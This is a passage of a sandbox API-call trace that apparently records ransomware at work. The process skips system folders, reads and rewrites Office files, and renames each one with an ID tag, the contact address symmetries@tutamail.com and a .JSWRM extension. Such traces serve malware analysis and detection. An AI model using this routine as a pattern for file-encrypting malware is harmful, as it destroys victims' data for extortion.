nNumberOfBytesToRead=0x5c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5c60, lpOverlapped=0x0) returned 1 [0116.503] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.503] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5c60, lpOverlapped=0x0) returned 1 [0116.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.505] CloseHandle (hObject=0x238) returned 1 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0116.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.505] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.506] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefbeab61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefbeab61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefc5d1a9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3068, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTOCOLHANDLERINTL.DLL", cAlternateFileName="PROTOC~1.DLL")) returned 1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2=".") returned 1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="..") returned 1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="...") returned 1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="windows") returned -1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="recovery") returned -1 [0116.506] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="perflogs") returned 1 [0116.507] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="documents and settings") returned 1 [0116.507] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.507] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="system volume information") returned -1 [0116.507] lstrcmpiW (lpString1="PROTOCOLHANDLERINTL.DLL", lpString2="msocache") returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTOCOLHANDLERINTL.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTOCOLHANDLERINTL.DLL", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTOCOLHANDLERINTL.DLL", lpUsedDefaultChar=0x0) returned 23 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTOCOLHANDLERINTL.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTOCOLHANDLERINTL.DLL", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTOCOLHANDLERINTL.DLL", lpUsedDefaultChar=0x0) returned 23 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0116.507] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3430bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3430bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa369325, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLN.DOC", cAlternateFileName="")) returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2=".") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="..") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="...") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="windows") returned -1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="recovery") returned -1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="perflogs") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="documents and settings") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="$RECYCLE.BIN") returned 1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="system volume information") returned -1 [0116.507] lstrcmpiW (lpString1="PROTTPLN.DOC", lpString2="msocache") returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.DOC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.DOC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.DOC", lpUsedDefaultChar=0x0) returned 12 [0116.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0116.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.DOC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.DOC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.DOC", lpUsedDefaultChar=0x0) returned 12 [0116.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0116.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0116.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.DOC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.509] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19968) returned 1 [0116.509] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0116.510] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4e00, lpOverlapped=0x0) returned 1 [0116.513] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.513] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4e00, lpOverlapped=0x0) returned 1 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.513] CloseHandle (hObject=0x238) returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.514] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.DOC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.doc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.DOC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.doc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.514] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3430bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3430bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa369325, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLN.PPT", cAlternateFileName="")) returned 1 [0116.514] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2=".") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="..") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="...") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="windows") returned -1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="recovery") returned -1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="perflogs") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="documents and settings") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="$RECYCLE.BIN") returned 1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="system volume information") returned -1 [0116.515] lstrcmpiW (lpString1="PROTTPLN.PPT", lpString2="msocache") returned 1 [0116.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.PPT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.PPT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.PPT", lpUsedDefaultChar=0x0) returned 12 [0116.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0116.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.PPT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.PPT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.PPT", lpUsedDefaultChar=0x0) returned 12 [0116.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0116.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.PPT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.516] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12288) returned 1 [0116.516] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3000) returned 0x24c1d0 [0116.516] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3000, lpOverlapped=0x0) returned 1 [0116.518] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.518] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3000, lpOverlapped=0x0) returned 1 [0116.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.518] CloseHandle (hObject=0x238) returned 1 [0116.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0116.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.PPT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.ppt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.PPT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.ppt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.520] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3430bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3430bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3430bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROTTPLN.XLS", cAlternateFileName="")) returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2=".") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="..") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="...") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="windows") returned -1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="recovery") returned -1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="perflogs") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="documents and settings") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="$RECYCLE.BIN") returned 1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="system volume information") returned -1 [0116.520] lstrcmpiW (lpString1="PROTTPLN.XLS", lpString2="msocache") returned 1 [0116.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.XLS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROTTPLN.XLS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROTTPLN.XLS", lpUsedDefaultChar=0x0) returned 12 [0116.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 